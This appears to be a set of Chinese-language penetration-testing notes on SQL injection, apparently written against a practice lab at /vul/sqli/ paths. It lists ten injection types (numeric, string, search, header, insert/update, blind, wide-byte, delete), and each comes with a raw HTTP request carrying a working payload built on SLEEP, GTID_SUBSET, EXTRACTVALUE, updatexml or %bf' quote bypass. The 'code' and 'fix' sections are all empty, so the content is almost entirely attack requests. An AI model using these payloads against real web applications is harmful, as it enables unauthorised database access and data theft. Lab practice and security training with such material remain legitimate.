sql注入
1、数字型注入
限制
submit参数必须存在
复现
POST /vul/sqli/sqli_id.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_id.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
id=1 AND GTID_SUBSET(CONCAT(0x7176787a71,(SELECT (ELT(7937=7937,1))),0x716b6b6271),7937)&submit=%E6%9F%A5%E8%AF%A2
代码
修复
2、字符型注入
限制
submit参数必须存在
复现
GET /vul/sqli/sqli_str.php?name=wwss' AND (SELECT 2605 FROM (SELECT(SLEEP(0)))FYCn)%23&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_str.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
代码
修复
3、搜索型注入
限制
submit参数必须存在
复现
GET /vul/sqli/sqli_search.php?name=1111' AND (SELECT 3758 FROM (SELECT(SLEEP(5)))DjNH)%23&submit=%E6%90%9C%E7%B4%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_search.php?name=qqq&submit=%E6%90%9C%E7%B4%A2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
代码
修复
4、xx型注入
限制
submit参数必须存在
复现
GET /vul/sqli/sqli_x.php?name=aa') AND (SELECT 1122 FROM (SELECT(SLEEP(5)))Jrjn)-- dgsV&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_x.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ne8pqc7qv0fcvrnbj1vspd981c
Connection: close
代码
修复
5、insert/update注入
限制
submit参数必须存在
复现
POST /vul/sqli/sqli_iu/sqli_edit.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 169
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_iu/sqli_edit.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close
sex=q' AND EXTRACTVALUE(2280,CONCAT(0x5c,0x7171786a71,(SELECT (ELT(2280=2280,1))),0x716b767671))-- E&phonenum=%27iii&add=iuuu%27and+1%3D1&email=22%40qq.com&submit=submit
代码
修复
6、http 头注入
限制
submit参数必须存在
复现
GET /vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: bbb.com:8882
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: '||(SELECT 0x66427650 WHERE 6659=6659 AND GTID_SUBSET(CONCAT(0x717a717871,(SELECT (ELT(5655=5655,1))),0x71786b6a71),5655))||'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_header/sqli_header_login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close
代码
修复
7、基于boolian的盲注
限制
submit参数必须存在
复现
GET /vul/sqli/sqli_blind_b.php?name=kobe' AND (SELECT 4721 FROM (SELECT(SLEEP(5)))EvmL) AND 'rXhQ'='rXhQ&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_blind_b.php?name=e&submit=%E6%9F%A5%E8%AF%A2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close
代码
修复
8、基于时间的盲注
限制
submit参数必须存在
复现
GET /vul/sqli/sqli_blind_t.php?name=yyy' AND (SELECT 3035 FROM (SELECT(SLEEP(5)))canh) AND 'dHLC'='dHLC&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_blind_t.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close
代码
修复
9、宽字节注入
限制
submit参数必须存在
复现
POST /vul/sqli/sqli_widebyte.php HTTP/1.1
Host: bbb.com:8882
Content-Length: 46
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bbb.com:8882
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_widebyte.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close
name=kobe%bf'or 1=1#&submit=%E6%9F%A5%E8%AF%A2
代码
修复
10、delete注入
限制
复现
GET /vul/sqli/sqli_del.php?id=1 or updatexml(1,concat(0x7e, database()),3) HTTP/1.1
Host: bbb.com:8882
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bbb.com:8882/vul/sqli/sqli_del.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=elt5a53c0n8v816aqn36gnunn7
Connection: close
代码
修复